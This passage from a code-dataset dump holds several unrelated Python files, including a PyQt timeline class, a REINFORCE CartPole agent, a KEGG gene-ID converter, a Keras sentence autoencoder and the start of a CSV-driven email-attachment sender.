_x = Input(shape=(input_dim,))\n factorization = simple_tensor_factorization(tensor_regularizer=reg())\n y = DenseTensor(units=output_dim,\n activation='softmax',\n kernel_regularizer=reg(),\n factorization=factorization)\n _y = y(_x)\n m = Model(_x, _y)\n m.compile(Adam(1e-3, decay=1e-4), loss='categorical_crossentropy', metrics=[\"accuracy\"])\n return m\n\n\nif __name__ == \"__main__\":\n path = \"output/dense_tensor\"\n model = tensor_model()\n experiment(path, model)\n","sub_path":"examples/example_tensor.py","file_name":"example_tensor.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"383369185","text":"from PyQt4 import QtGui\n\n\nclass TimelineDelta(object):\n def __init__(self, begin, end=30, title=None, height=30, top=0, parent=None):\n self._top = top\n self._height = height\n self._parent = parent\n self._title = title\n self._lock = False\n if self.track not in parent._tracks_info.keys():\n self._defautcolor = parent._defautcolor\n else:\n self._defautcolor = parent._tracks_info[self.track][1]\n self._begin = begin\n self._end = end\n\n if self.track >= self._parent.numberoftracks:\n self._parent.numberoftracks = self.track + 1\n\n\n ######################################################################################\n #### HELPERS/FUNCTIONS ###############################################################\n ######################################################################################\n\n def collide(self, x, y):\n return self.begin <= x <= self.end and self._top <= y<= (self._top + self._height)\n\n def canSlideBegin(self, x, y):\n return not self._lock and x == int(round(self.begin)) and self._top <= y <= (self._top + self._height)\n\n def canSlideEnd(self, x, y):\n return not self._lock and int(round(self.end)) == x and self._top <= y <= (self._top + self._height)\n\n def moveEnd(self, x):\n \"\"\"Move the right edge of the event rectangle.\"\"\"\n # Do nothing if locked\n if self._lock:\n return\n\n # Do nothing if trying to go over the pther edge\n if self._end <= self._begin - x and x < 0:\n return\n\n # Increment accordingly\n self._end += x / self._parent._scale\n\n # Minimum begin position is at 0\n if self._end > (self._parent.width() / self._parent._scale):\n self._end = (self._parent.width() / self._parent._scale)\n\n def moveBegin(self, x):\n \"\"\"Move the left edge of the event rectangle.\"\"\"\n # Do nothing if locked\n if self._lock:\n return\n\n # Do nothing if trying to go over the other edge\n if self._begin >= self._end - x and x > 0:\n return\n\n # Increment accordingly\n self._begin += x / self._parent._scale\n\n # Minimum begin position is at 0\n if self._begin < 0:\n self._begin = 0\n\n def move(self, x, y):\n if self._lock: return\n if (self.begin + x) >= 0 and (self.end + x) <= self._parent.width():\n self._begin += x / self._parent._scale\n self._end += x / self._parent._scale\n current_track = self.track\n new_track = (y - 20) // 34\n if current_track != new_track and new_track >= 0 and new_track <= self._parent.numberoftracks:\n self.track = new_track\n if new_track >= self._parent.numberoftracks: self._parent.numberoftracks += 1\n\n def showEditWindow(self):\n text, ok = QtGui.QInputDialog.getText(self._parent, 'Edit event', 'Comment:', text=self._title)\n if ok: self._title = str(text)\n\n def draw(self, painter, showvalues = False):\n start, end = self.begin, self.end\n if self._lock:\n transparency = 0.1\n else:\n transparency = 0.5\n painter.setPen(QtGui.QColor(0, 0, 0))\n painter.setOpacity(transparency)\n painter.drawRoundedRect(start, self._top, end-start, self._height, 3,3)\n painter.setOpacity(1.0)\n\n painter.drawText(start+3, self._top+19, self._title )\n if showvalues:\n painter.drawText(start, self._top+44, \"[%d;%d] delta:%d\" % (self._begin, self._end, self._end-self._begin))\n\n\n ######################################################################################\n #### PROPERTIES ######################################################################\n ######################################################################################\n\n @property\n def lock(self): return self._lock\n @lock.setter\n def lock(self, value): self._lock = value\n\n @property\n def begin(self): return self._begin*self._parent._scale\n @begin.setter\n def begin(self, value):\n if self._lock: return\n self._begin = value/self._parent._scale\n if self._begin<0: self._begin=0\n\n @property\n def end(self): return self._end*self._parent._scale\n @end.setter\n def end(self, value):\n if self._lock: return\n self._end = value/self._parent._scale\n if self._end>(self._parent.width()/self._parent._scale):\n self._end=(self._parent.width()/self._parent._scale)\n\n @property\n def track(self):\n return (self._top - 20) // 34\n @track.setter\n def track(self, value):\n #FIXME This was preventing assigning a track when importing ingo locked\n # Is it needed?\n # if self._lock: return\n self._top = value * 34 + 20\n\n @property\n def color(self): return self._defautcolor\n @color.setter\n def color(self, value):\n if type(value)==str: self._defautcolor = QtGui.QColor(value)\n else: self._defautcolor = value\n\n # @property\n # def row(self):\n # return [ int(round(self._begin)),\n # int(round(self._end)),\n # self._title,\n # self.track,\n # self._defautcolor.name(),\n # self._lock ]\n\n # @row.setter\n # def row(self, value):\n # self._begin = int(value[0])\n # self._end = int(value[1])\n # self._title = value[2]\n # self.track = int(value[3])\n # self._defautcolor = QtGui.QColor(value[4])\n # self._lock = value[5]=='True'\n\n # if self.track>=self._parent.numberoftracks: self._parent.numberoftracks = self.track+1\n\n\n #TODO redefinition of the property above to write to file in the new format\n # This is a bad idea, better to access these individually\n @property\n def properties(self):\n return [self._lock,\n int(round(self._begin)),\n int(round(self._end)),\n self._title,\n self._defautcolor.name(),\n self.track]\n\n @properties.setter\n def properties(self, value):\n self._lock = value[0]=='True'\n self._begin = int(value[1])\n self._end = int(value[2])\n self._title = value[3]\n self._defautcolor = QtGui.QColor(value[4])\n self.track = int(value[5])\n\n if self.track >= self._parent.numberoftracks:\n self._parent.numberoftracks = self.track + 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pyforms/Controls/ControlEventTimeline/TimelineDelta.py","file_name":"TimelineDelta.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"145195208","text":"# -*- coding: utf-8 -*-\n\n#abrindo o arquivo no mesmo diretório\nwith open('file.txt') as file_object:\n\tcontents = file_object.read()\n\tprint(contents)\n\t\n\n# abrindo arquico em outro diretório\nwith open('files/file.txt') as file_object:\n\tcontents = file_object.read()\n\tprint(contents)","sub_path":"Livro-Curso-intensivo-de-PYTHON/cap-10-arquivos-e-excecoes/01_lendo_arquivo.py","file_name":"01_lendo_arquivo.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"251853392","text":"with open(\"fission_yeast_genename_genesymbol.txt\", \"r\") as translate_file:\n foreign_new_id = {}\n translate_file.readline()\n for line in translate_file:\n line = line.strip().split(\"\\t\")\n if len(line) > 1:\n if \"; \" in line[1]:\n line[1] = line[1].split(\"; \")\n for id in line[1]:\n if line[0] not in foreign_new_id:\n foreign_new_id[line[0]] = []\n foreign_new_id[line[0]].append(id)\n else:\n if line[0] not in foreign_new_id:\n foreign_new_id[line[0]] = []\n foreign_new_id[line[0]].append(line[1])\n\nwith open(\"KEGG_Paths2geneIDs\", \"r\") as input_file:\n pathway_gene = {}\n for line in input_file:\n line = line.strip().split(\"\\t\")\n kegg_ids = line[1].split(\" \")\n if line[0] not in pathway_gene:\n pathway_gene[line[0]] = []\n pathway_gene[line[0]] = kegg_ids\n\npathway_genesymbol_list = {}\nfor pathway, gene_list in pathway_gene.items():\n for gene in gene_list:\n if gene in foreign_new_id:\n if pathway not in pathway_genesymbol_list:\n pathway_genesymbol_list[pathway] = []\n pathway_genesymbol_list[pathway].append(foreign_new_id[gene])\n else:\n if pathway not in pathway_genesymbol_list:\n pathway_genesymbol_list[pathway] = []\n pathway_genesymbol_list[pathway].append(foreign_new_id[gene])\n\nwith open(\"fission_yeast_pathway_genesymbol.csv\", \"w\") as output:\n for pathway, genesymbols in pathway_genesymbol_list.items():\n for gs in genesymbols:\n output.write(pathway + \";\" + \",\".join(gs) + \"\\n\")\n\ndef gmt_creator(input_file, sep, output_file):\n parameter_gene = {}\n with open(input_file, \"r\") as input_file:\n for line in input_file:\n line = line.strip().split(sep)\n if line[0] not in parameter_gene:\n parameter_gene[line[0]] = []\n parameter_gene[line[0]].append(line[1])\n with open(output_file, \"w\") as output:\n for parameter in parameter_gene:\n output.write(parameter + \";\" + \",\".join(parameter_gene[parameter]) + \"\\n\")\n\ngmt_creator(\"fission_yeast_pathway_genesymbol.csv\",\";\", \"KEGG_Schizosaccharomyces_pombe_GeneSymbol.gmt\")","sub_path":"KEGG/Schizosaccharomyces pombe/foreignid_to_genesymbol.py","file_name":"foreignid_to_genesymbol.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"271774597","text":"\nimport gym\nfrom tqdm import tqdm\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n\nimport torch\ntorch.manual_seed( 0 )\nimport torch.nn as nn\nimport torch.nn.functional as func\nimport torch.optim as optim\nfrom torch.distributions import Categorical\n\nplt.ion()\n\nDEBUG_ANALYZE_GRAPH = True\n# BATCH_SIZE = 10\n\n# create the environment\n_env = gym.make( 'CartPole-v0' )\n## _env = gym.make( 'MountainCar-v0' )\n_env.seed( 0 )\nprint( 'S: ', _env.observation_space )\nprint( 'A: ', _env.action_space )\n\n# initialize pytorch-cuda device\n_device = torch.device( 'cuda:0' if torch.cuda.is_available() else 'cpu' )\n\n# define architecture of the policy network\n# MLP with a single hidden layer\n\nclass Policy( nn.Module ) :\n\n def __init__( self, dimInput = 4, dimOutput = 2, dimHidden = 20 ) :\n super( Policy, self ).__init__()\n\n self.fc1 = nn.Linear( dimInput, dimHidden )\n self.fc2 = nn.Linear( dimHidden, dimOutput )\n\n def forward( self, s ) :\n s = func.relu( self.fc1( s ) )\n s = func.softmax( self.fc2( s ), dim = 1 )\n return s\n\n def act( self, s ) :\n # transform state to tensor and send to device\n s = torch.from_numpy( s ).float().unsqueeze( 0 ).to( _device )\n # compute the probabilities p = pi(a|s) for all actions using the policy\n p = self.forward( s ).cpu()\n # grab the action using those probabilities (stochastic)\n pdist = Categorical( p )\n a = pdist.sample()\n\n # return the action (to execute) and the log probability\n return a.item(), pdist.log_prob( a )\n\n_policy = Policy( _env.observation_space.shape[0], \n _env.action_space.n ).to( _device )\n_optimizer = optim.Adam( _policy.parameters(), lr = 1e-2 )\n\n# training with REINFORCE algorithm\ndef reinforce( nEpisodes = 1000, \n nMaxStepsEpisode = 1000,\n gamma = 1.0,\n printEvery = 100 ) :\n \n # for 100 most recent\n _scoresDeque = deque( maxlen = 100 )\n # for all history of scores\n _scoresBuffer = []\n\n for iEpisode in tqdm( range( nEpisodes ) ) :\n _logProbsBuffer = []\n _rewardsBuffer = []\n _state = _env.reset()\n\n # collect m=1 episode\n for _ in range( nMaxStepsEpisode ) :\n # use policy network to get action and log probability\n _action, _logProb = _policy.act( _state )\n _logProbsBuffer.append( _logProb )\n # take a step in the simulation\n _state, _reward, _done, _ = _env.step( _action )\n _rewardsBuffer.append( _reward )\n if _done :\n break\n\n _scoresDeque.append( sum( _rewardsBuffer ) )\n _scoresBuffer.append( sum( _rewardsBuffer ) )\n\n # _npRewards = np.array( _rewardsBuffer )\n # _npRewards = ( _npRewards - np.mean( _npRewards ) ) / ( np.std( _npRewards ) + 0.0000001 )\n _discounts = [ gamma ** i for i in range( len( _rewardsBuffer ) + 1 ) ]\n _R = sum( [ a * b for a, b in zip( _discounts, _rewardsBuffer ) ] )\n\n _policyLoss = []\n for _logProb in _logProbsBuffer :\n # change sign to use SGD (not ascent)\n _policyLoss.append( -_logProb * _R )\n\n # concatenate all losses into tensor and compute the sum of this tensor\n # (garbage collector, I choose you!) just reassign the ref. variable and\n # let gc go its job. The loss is of type tensor (check type<>) so can\n # access the gradient from autograd with backward\n _policyLoss = torch.cat( _policyLoss ).sum()\n\n # do backprop\n _optimizer.zero_grad()\n _policyLoss.backward()\n _optimizer.step()\n\n _meanScore = np.mean( _scoresDeque )\n if iEpisode % printEvery == 0 :\n print( 'Episode {}\\tAverage Score: {:.2f}'.format( iEpisode, _meanScore ) )\n if _meanScore >= 195.0 :\n print( 'Environment solved in {:d} episodes\\tAverage score: {:.2f}'.format( iEpisode, _meanScore ) )\n break\n\n return _scoresBuffer\n\n_scores = reinforce()\n\n# plot the training results\n_fig = plt.figure()\n_ax = _fig.add_subplot( 111 )\nplt.plot( np.arange( 1, len( _scores ) + 1 ), _scores )\nplt.ylabel( 'Score' )\nplt.xlabel( 'Episode #' )\nplt.show()\n\n# test the agent\n_env = gym.make( 'CartPole-v0' )\n## _env = gym.make( 'MountainCar-v0' )\n\nfor _ in range( 5 ) :\n _state = _env.reset()\n for t in range( 10000 ) :\n _action, _ = _policy.act( _state )\n _env.render()\n _state, _reward, _done, _ = _env.step( _action )\n if _done:\n print( 'done! t: {:d}'.format( t ) )\n break \n\n_env.close()","sub_path":"rl/pg/reinforce_cartpole_pytorch.py","file_name":"reinforce_cartpole_pytorch.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"404926220","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\nfrom deepdive import *\nimport re\nimport divlaw\n\n@tsv_extractor\n@returns(lambda\n law_id =\"text\",\n\t\ttotalPart =\"int\",\n \tpart_index =\"int\",\n \t\tpart_start =\"int\",\n \tpart_end =\"int\",\n \tpart_name\t=\"text\"\n :[])\ndef extract(\n id = \"text\",\n content = \"text\"\n ):\n\n\ta = divlaw.divPart(content)\n\ttotalPart = divlaw.getTotalPart(a)\n\tif totalPart > 0:\n\t\tfor i in range(0,totalPart):\n\t\t\tyield [\n\t\t\t\tid,\n\t\t\t\ttotalPart,\n\t\t\t\ti,\n\t\t\t\tdivlaw.getPart(a,i)['start'],\n\t\t\t\tdivlaw.getPart(a,i)['end'],\n\t\t\t\tdivlaw.getPart(a,i)['name'],\n\t\t\t]\n\telse :\n\t\tyield [\n\t\t\tid,\n\t\t\t0,\n\t\t\t0,\n\t\t\tdivlaw.getPart(a,0)['start'],\n\t\t\tdivlaw.getPart(a,0)['end'],\n\t\t\tNone,\n\t\t]","sub_path":"deepdive/udf/extract_parts.py","file_name":"extract_parts.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"240012748","text":"# -*- coding: utf-8 -*-\nimport json\nimport numpy as np\nfrom io import open\nfrom math import ceil\nimport sys\nimport os\nfrom random import shuffle\nfrom nltk import word_tokenize\n\nfrom keras.layers import Dense, Input, GRU, RepeatVector, Masking, Activation, Embedding, Lambda\n#from keras.models import Model, load_model\nfrom nnkeras.engine.training import Model\nimport keras.backend as K\n\n\nimport config\nimport settings\nfrom models.emb_sentence import EmbSentenceEncoder, EmbSentenceDecoder\nimport emb_word\n\ndef loss_func(x):\n enc_words = x[0]\n dec_words = x[1]\n trunc_dec_words = dec_words[:, :x[2][0][0],:]\n return enc_words - trunc_dec_words\n\n\ndef get_data():\n with open(settings.DATA_STORAGE+config.CHARS_FILENAME, \"rt\", encoding=\"utf8\") as f:\n chars = json.load(f)\n total_char_count = np.sum(chars.values())\n chars_decode = [ch for ch in chars.keys()]\n chars_decode.sort()\n chars_encode = {}\n for idx, char in enumerate(chars_decode):\n chars_encode[char] = idx\n with open(settings.DATA_STORAGE+config.SENTENCES_FILENAME, \"rt\", encoding='utf8') as f:\n sentences = f.read().lower().split(\"\\n\")\n sentences = [word_tokenize(s) for s in sentences]\n\n return {\"sentences\": sentences,\n \"chars_encode\": chars_encode,\n \"chars_decode\": chars_decode,\n \"char_count\": len(chars_encode)+2}\n\n\n\ndef prepare_objects(data):\n indexes = range(len(data['sentences']))\n shuffle(indexes)\n train_segment = int(len(indexes)*0.9)\n\n train_indexes = indexes[:train_segment]\n val_indexes = indexes[train_segment:]\n\n model = build_model(data)\n data_gen = build_generator(data, train_indexes)\n val_gen = build_generator(data, val_indexes)\n return {'model': model,\n 'data_gen': data_gen,\n 'val_gen': val_gen,\n 'train_indexes': train_indexes,\n 'val_indexes': val_indexes}\n\n\ndef prepare_data(data, emb_word_encoder):\n result = {}\n buckets = {}\n for sentence in data['sentences']:\n words = word_tokenize(sentence)\n for word in words:\n bucket_size = ceil((len(word)+1.0) / settings.BUCKET_STEP)*settings.BUCKET_STEP\n if bucket_size not in buckets:\n buckets[bucket_size] = set()\n buckets[bucket_size].add(word)\n for bucket_size in buckets.keys():\n words = list(buckets[bucket_size])\n words.sort()\n X, Y, sample_weights = emb_word.build_batch(data, words)\n encoded_words = emb_word_encoder.predict(X, sample_weight=sample_weights)\n for idx, word in enumerate(words):\n result[word] = encoded_words[idx]\n return result\n\n\n\n\ndef build_model(data):\n data_input = Input(shape=(settings.MAX_SENTENCE_LEN, settings.MAX_WORD_LEN), dtype=\"int32\")\n bucket_word_size_input = Input(shape=(1,), dtype=\"int32\")\n bucket_sentence_size_input = Input(shape=(1,), dtype=\"int32\")\n encoder = EmbSentenceEncoder(char_units=data[\"char_count\"],\n word_units=settings.WORD_EMB_UNITS,\n sentence_units=settings.SENTENCE_EMB_UNITS,\n l2=settings.L2,\n dropout_w=settings.DROPOUT_W,\n dropout_u=settings.DROPOUT_U,\n batch_size=settings.BATCH_SIZE,\n pretrained=settings.PRETRAINED)([data_input, bucket_word_size_input, bucket_sentence_size_input])\n decoder = EmbSentenceDecoder(max_len_sentence=settings.MAX_SENTENCE_LEN,\n max_len_word=settings.MAX_WORD_LEN,\n char_units=data[\"char_count\"],\n word_units=settings.WORD_EMB_UNITS,\n sentence_units=settings.SENTENCE_EMB_UNITS,\n l2=settings.L2,\n dropout_w=settings.DROPOUT_W,\n dropout_u=settings.DROPOUT_U,\n batch_size=settings.BATCH_SIZE,\n pretrained=settings.PRETRAINED,\n name='decoder')(encoder)\n #enc_dec_layer = Lambda(function=loss_func, name='word_binding')([encoder[1], decoder[1], bucket_sentence_size_input])\n model = Model(inputs=[data_input, bucket_word_size_input, bucket_sentence_size_input], outputs=decoder)\n model.compile(optimizer='adam', loss={'decoder':'categorical_crossentropy'}, sample_weight_dim={'decoder':3}, metrics={'decoder':\"categorical_accuracy\"})\n\n if settings.PRETRAINED:\n emb_word_model = emb_word.build_model(data)\n emb_word_model.load_weights(settings.MODEL_STORAGE+\"emb_word.h5\")\n model.layers[3].embeddings.set_value(K.get_value(emb_word_model.layers[2].embeddings))\n model.layers[3].W_word.set_value(K.get_value(emb_word_model.layers[2].W))\n model.layers[3].U_word.set_value(K.get_value(emb_word_model.layers[2].U))\n model.layers[3].b_word.set_value(K.get_value(emb_word_model.layers[2].b))\n model.layers[3].gammas_word.set_value(K.get_value(emb_word_model.layers[2].gammas))\n model.layers[3].betas_word.set_value(K.get_value(emb_word_model.layers[2].betas))\n model.layers[4].W_word.set_value(K.get_value(emb_word_model.layers[3].W))\n model.layers[4].U_word.set_value(K.get_value(emb_word_model.layers[3].U))\n model.layers[4].b_word.set_value(K.get_value(emb_word_model.layers[3].b))\n model.layers[4].gammas_word.set_value(K.get_value(emb_word_model.layers[3].gammas))\n model.layers[4].betas_word.set_value(K.get_value(emb_word_model.layers[3].betas))\n model.layers[4].W_emb_word.set_value(K.get_value(emb_word_model.layers[3].W_emb))\n model.layers[4].b_emb_word.set_value(K.get_value(emb_word_model.layers[3].b_emb))\n return model\n\ndef build_generator(data, indexes):\n def generator():\n walk_order = list(indexes)\n np.random.shuffle(walk_order)\n buckets = {}\n while True:\n idx = walk_order.pop()-1\n sentence = data['sentences'][idx]\n if len(walk_order) == 0:\n walk_order = list(indexes)\n np.random.shuffle(walk_order)\n if len(sentence) > settings.MAX_SENTENCE_LEN - 1:\n continue\n bucket_size = int(ceil((len(sentence)+1.0) / settings.BUCKET_STEP)*settings.BUCKET_STEP)\n if bucket_size not in buckets:\n buckets[bucket_size] = []\n buckets[bucket_size].append(sentence)\n if len(buckets[bucket_size])==settings.BATCH_SIZE:\n X, Y, sample_weights, word_bucket_size = build_batch(data, buckets[bucket_size])\n batch_sentences = buckets[bucket_size]\n buckets[bucket_size] = []\n\n bucket_sentence_size_input = np.zeros((settings.BATCH_SIZE,1), dtype=int)\n bucket_sentence_size_input[0][0]=bucket_size\n\n bucket_word_size_input = np.zeros((settings.BATCH_SIZE,1), dtype=int)\n bucket_word_size_input[0][0]=word_bucket_size\n\n word_binding = np.zeros((settings.BATCH_SIZE, bucket_size, settings.WORD_EMB_UNITS))\n word_binding_weights = np.ones((settings.BATCH_SIZE, bucket_size))\n\n yield [X, bucket_word_size_input, bucket_sentence_size_input], Y, sample_weights, batch_sentences\n return generator()\n\ndef build_batch(data, bucket):\n X = np.zeros((settings.BATCH_SIZE, settings.MAX_SENTENCE_LEN, settings.MAX_WORD_LEN), dtype=\"int32\")\n Y = np.zeros((settings.BATCH_SIZE, settings.MAX_SENTENCE_LEN, settings.MAX_WORD_LEN, data['char_count']))\n sample_weights = np.zeros((settings.BATCH_SIZE, settings.MAX_SENTENCE_LEN, settings.MAX_WORD_LEN))\n word_bucket_size = 0\n for i, sample in enumerate(bucket):\n sentence = sample\n for word_pos in range(len(sentence)):\n word = sentence[word_pos]\n if len(word) > word_bucket_size:\n word_bucket_size = len(word)\n for ch_pos in range(len(word)):\n if word[ch_pos] in data['chars_encode']:\n X[i][word_pos][ch_pos] = data['chars_encode'][word[ch_pos]] + 1\n Y[i][word_pos][ch_pos][data['chars_encode'][word[ch_pos]]] = True\n else:\n X[i][word_pos][ch_pos] = data['char_count']\n Y[i][word_pos][ch_pos][-2] = True\n sample_weights[i][word_pos][ch_pos] = 1\n X[i][word_pos][len(word)] = data['char_count'] - 1\n Y[i][word_pos][len(word)][-1] = True\n sample_weights[i][word_pos][len(word)] = 1\n return X, Y, sample_weights, word_bucket_size\n\n\n\ndef run_training(data, objects):\n model = objects['model']\n epoch_size = int(len(objects['train_indexes'])*1.0/(settings.EPOCH_MULT*settings.BATCH_SIZE))\n val_epoch_size = int(len(objects['val_indexes'])*1.0/(1*settings.BATCH_SIZE))\n sys.stdout.write(\"\\nTrain epoch size = {}; val epoch size = {}\".format(epoch_size, val_epoch_size))\n for epoch in range(settings.EPOCHS):\n sys.stdout.write(\"\\n\\nEpoch {}\\n\".format(epoch+1))\n losses = []\n avg_losses = []\n\n for j in range(epoch_size):\n X, Y, sample_weights, words = next(objects['data_gen'])\n loss = model.train_on_batch(X, Y, sample_weight=sample_weights)\n for idx, loss_value in enumerate(loss):\n if len(losses) == idx:\n losses.append([])\n avg_losses.append(0)\n losses[idx].append(loss_value)\n avg_losses[idx] = np.sum(losses[idx])*1.0/len(losses[idx])\n\n msg = \"\\rTraining batch {} / {}: \".format(j+1, epoch_size)\n msg2 = \", \".join([\"loss{} = {:.4f}\".format(idx, avg_losses[idx]) for idx in range(len(avg_losses))])\n sys.stdout.write(msg+msg2)\n\n losses = []\n avg_losses = []\n sys.stdout.write(\"\\n\")\n for i in range(val_epoch_size):\n X, Y, sample_weights, words = next(objects['val_gen'])\n loss = model.evaluate(X, Y, batch_size=settings.BATCH_SIZE, verbose=0, sample_weight=sample_weights)\n for idx, loss_value in enumerate(loss):\n if len(losses) == idx:\n losses.append([])\n avg_losses.append(0)\n losses[idx].append(loss_value)\n avg_losses[idx] = np.sum(losses[idx])*1.0/len(losses[idx])\n\n msg = \"\\rTesting batch {} / {}: \".format(i+1, epoch_size)\n msg2 = \", \".join([\"loss{} = {:.4f}\".format(idx, avg_losses[idx]) for idx in range(len(avg_losses))])\n sys.stdout.write(msg+msg2)\n\n\ndef train():\n data = get_data()\n objects = prepare_objects(data)\n run_training(data, objects)\n\n\ndef test():\n data = get_data()\n objects = prepare_objects(data)\n while True:\n X, Y_true, sample_weights, words_true = next(objects['data_gen'])\n Y_pred = objects['model'].predict(X)\n Y_pred2 = np.argmax(Y_pred, axis=2)\n words_pred = []\n for i in range(settings.BATCH_SIZE):\n word = \"\"\n for j in range(settings.MAX_LEN):\n word_index = Y_pred2[i,j]\n if word_index == data['char_count']-2:\n break\n elif word_index == data['char_count']-1:\n c = \" \"\n else:\n c = data['chars_decode'][word_index]\n word += c\n words_pred.append(word)\n\nif __name__ == \"__main__\":\n train()","sub_path":"scripts/emb_sentence.py","file_name":"emb_sentence.py","file_ext":"py","file_size_in_byte":11621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"66731095","text":"import pickle\r\n\r\n\r\ndef make_data():\r\n global lst\r\n file = open(\"static/binary3.dat\", 'wb')\r\n s = int(input(\"enter the no. of dicitonaries: \"))\r\n lst = []\r\n for i in range(s):\r\n d = {}\r\n n = int(input(\"enter the no. of records: \"))\r\n for j in range(n):\r\n x = input(\"enter the details: \")\r\n y = int(input(\"enter a choice (1-int,2-str): \"))\r\n if y == 1:\r\n g = int(input(\"enter the number: \"))\r\n d[x] = g\r\n else:\r\n h = input(\"enter the word: \")\r\n d[x] = h\r\n k = input(\"do you want to enter more data?(y/n): \")\r\n if k in ['y', 'y']:\r\n op = 1\r\n else:\r\n op = 0\r\n if op == 1:\r\n s = open('static/binary3.dat', 'ab')\r\n x = int(input(\"enter the no. of additions: \"))\r\n for i in range(x):\r\n a = input(\"enter the details: \")\r\n y = int(input(\"enter a choice (1-int,2-str): \"))\r\n if y == 1:\r\n x = int(input(\"enter the number: \"))\r\n d[a] = x\r\n else:\r\n y = input(\"enter the word: \")\r\n d[a] = y\r\n s.close()\r\n lst.append(d)\r\n pickle.dump(lst, file)\r\n file.close()\r\n file = open('static/binary3.dat', 'rb')\r\n print(\"the record is: \", pickle.load(file))\r\n file.close()\r\n\r\n\r\nmake_data()\r\n\r\n\r\ndef get_data():\r\n file = open(\"static/binary3.dat\", 'rb')\r\n a = pickle.load(file)\r\n final = False\r\n fir = int(input(\"enter the number: \"))\r\n for i in a:\r\n for key, value in i.items():\r\n if value == fir:\r\n print(\"the corresponding record of the fir no. \", value, ' is: ', i)\r\n final = True\r\n break\r\n if final == False:\r\n print(\"no such record !!!\")\r\n file.close()\r\n\r\n\r\nget_data()\r\n\r\n\r\ndef update_data():\r\n file = open(\"static/binary3.dat\", 'rb')\r\n s = pickle.load(file)\r\n lst2 = []\r\n for i in s:\r\n if i['year'] < 2005:\r\n s = open(\"binary3.dat\", 'wb')\r\n i['status'] = 'disposed'\r\n lst2.append(i)\r\n pickle.dump(lst2, s)\r\n s.close()\r\n file.close()\r\n file = open(\"static/binary3.dat\", 'rb')\r\n print(\"the edited record is: \", pickle.load(file))\r\n file.close()\r\n\r\n\r\nupdate_data()\r\n","sub_path":"Class 12/File_Handling/Binary files/binary_3.py","file_name":"binary_3.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"518757888","text":"# coding: utf-8\nimport csv\nimport smtplib\nimport os\nfrom os.path import basename\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import COMMASPACE, formatdate\nimport argparse\nfrom datetime import datetime\n\n\nimport logging\n\nlogger = logging.getLogger('base')\nlogger.setLevel(logging.DEBUG)\n\n# create file handler which logs even debug messages\nfh = logging.FileHandler('logfile.log')\nfh.setLevel(logging.DEBUG)\n\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n\n# create formatter and add it to the handlers\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n\n# add the handlers to the logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\n#stupid python can not stand infinitives\nmonths = {\n 1:\"январь\",\n 2:\"февраль\",\n 3:\"март\",\n 4:\"апрель\",\n 5:\"май\",\n 6:\"июнь\",\n 7:\"июль\",\n 8:\"август\",\n 9:\"сентябрь\",\n 10:\"октябрь\",\n 11:\"ноябрь\",\n 12:\"декабрь\",\n}\n\ndef send_mail(smtp_server, send_from, send_to, subject=\"\", text=\"\", files=None):\n '''Sends email with attachments using logged smtp_server object'''\n msg = MIMEMultipart()\n msg['From'] = send_from\n msg['To'] = \", \".join(send_to)\n msg['Date'] = formatdate(localtime=True)\n msg['Subject'] = subject\n msg.attach(MIMEText(text))\n\n for f in (files or []):\n file_basename = basename(f)\n with open(f, \"rb\") as binary_file:\n part = MIMEApplication(binary_file.read(), Name=file_basename)\n part['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(file_basename)\n msg.attach(part)\n\n smtp_server.sendmail(send_from, send_to, msg.as_string())\n\ndef read_configuration(config_file):\n '''Reads configuration from opened file, config format: key = value'''\n conf = {}\n with config_file as f:\n lines = f.read().splitlines()\n lines = list(filter(lambda x: x.strip() != \"\" and x.strip()[0] != \"#\", lines))\n lines = list(map(lambda l: map(lambda x: x.strip(), l.replace(\"#nl#\", \"\\n\").split(\"=\")), lines))\n for line in lines:\n k, v = line\n conf[k] = v\n return conf\n\ndef generate_subject_and_body(raw_code, file_code, subject_raw, body_raw):\n '''Generates subject and body of the letter based on raw code and dummy strings'''\n year, month, _, _ = raw_code.split(\"_\") # year_month_code_\n month = months[int(month)]\n subject = subject_raw.format(file_code, month, year)\n body = body_raw.format(month, year)\n return subject, body\n\ndef process_csv(smtp_server, csvfile, config):\n '''Processes strings from csvfile and returns filename of a modified copy of csvfile'''\n with open(\"tmp_\" + basename(csvfile.name), 'w', encoding=\"cp1251\") as tmp:\n reader = csv.reader(csvfile, delimiter=config.get(\"delimiter\", \";\"))\n writer = csv.writer(tmp, delimiter=config.get(\"delimiter\", \";\"), lineterminator=\"\\n\")\n for i, row in enumerate(reader):\n if not row:\n continue\n raw_code, mode, timepoint, price, raw_recepients, company_name, file1, file2, file_code = row\n recepients = list(map(lambda string: string.strip(), raw_recepients.replace(\"*\", \"\").split(\",\")))\n send_from = config.get(\"from\", \"\") \n subject, body = generate_subject_and_body(raw_code, file_code, config.get(\"subject_raw\", \"\"), config.get(\"body_raw\", \"\"))\n files = [file1.strip(), file2.strip()]\n\n should_send = True\n if mode.strip() == 